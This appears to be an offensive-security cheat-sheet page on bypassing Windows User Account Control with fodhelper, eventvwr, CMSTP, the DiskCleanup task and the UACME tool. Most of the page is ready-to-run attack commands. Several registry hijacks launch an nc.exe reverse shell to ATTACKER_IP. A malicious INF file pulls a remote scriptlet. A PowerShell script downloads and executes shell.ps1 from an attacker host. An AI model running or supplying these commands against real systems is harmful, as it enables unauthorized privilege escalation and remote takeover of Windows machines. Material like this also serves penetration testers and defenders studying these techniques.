> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# UAC Bypass

> User Account Control bypass techniques: fodhelper, eventvwr, CMSTP, DiskCleanup, and UACME.

## Overview

UAC (User Account Control) prompts for elevation. If the user is in the local Administrators group but running in a medium-integrity context, UAC bypass escalates to high integrity without the prompt.

### Check UAC Status

```cmd theme={"dark"}
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
```

| ConsentPromptBehaviorAdmin | Meaning                                               |
| -------------------------- | ----------------------------------------------------- |
| `0`                        | Elevate without prompting                             |
| `1`                        | Prompt for credentials on the secure desktop          |
| `2`                        | Prompt for consent on the secure desktop              |
| `4`                        | Prompt for consent                                    |
| `5`                        | Default — prompt for consent for non-Windows binaries |

### Check Current Integrity Level

```cmd theme={"dark"}
whoami /groups | findstr "Label"
```

| Label                    | Level                        |
| ------------------------ | ---------------------------- |
| `Medium Mandatory Level` | Standard — UAC bypass needed |
| `High Mandatory Level`   | Already elevated             |

***

## fodhelper.exe

Auto-elevates. Reads a registry key we can control.

```cmd theme={"dark"}
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f
fodhelper.exe
```

Cleanup:

```cmd theme={"dark"}
reg delete HKCU\Software\Classes\ms-settings\Shell\Open\command /f
```

***

## eventvwr.exe

Similar to fodhelper — abuses `mmc.exe` auto-elevation.

```cmd theme={"dark"}
reg add HKCU\Software\Classes\mscfile\Shell\Open\command /d "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" /f
eventvwr.exe
```

Cleanup:

```cmd theme={"dark"}
reg delete HKCU\Software\Classes\mscfile\Shell\Open\command /f
```

***

## CMSTP.exe

Connection Manager Profile Installer. Loads INF file that executes commands.

### Create Malicious INF

```ini theme={"dark"}
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://ATTACKER_IP/payload.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Bypass"
ShortSvcName="Bypass"
```

### Execute

```cmd theme={"dark"}
cmstp.exe /ni /s malicious.inf
```

***

## DiskCleanup (schtasks)

Environment variable `windir` hijack.

```cmd theme={"dark"}
set windir=C:\Windows\Temp & schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
```

Place payload at:

```cmd theme={"dark"}
C:\Windows\Temp\System32\cleanmgr.exe
```

***

## UACME — Automated Bypass

Collection of 70+ UAC bypass methods.

```bash theme={"dark"}
https://github.com/hfiref0x/UACME
```

### Usage

```cmd theme={"dark"}
Akagi64.exe <method_number> "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
```

Common methods:

| #  | Technique                       | Works on      |
| -- | ------------------------------- | ------------- |
| 23 | pkgmgr                          | Windows 10    |
| 33 | fodhelper                       | Windows 10/11 |
| 34 | DiskCleanup                     | Windows 10    |
| 41 | CMSTP                           | Windows 10    |
| 61 | slui / changepk registry hijack | Windows 10/11 |
| 78 | SSPI datagram                   | Windows 10/11 |

***

## PowerShell Script (fodhelper)

```powershell theme={"dark"}
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
```

<Warning>
  UAC bypass only works if user is already in Administrators group. It escalates from medium to high integrity, not from standard user to admin.
</Warning>
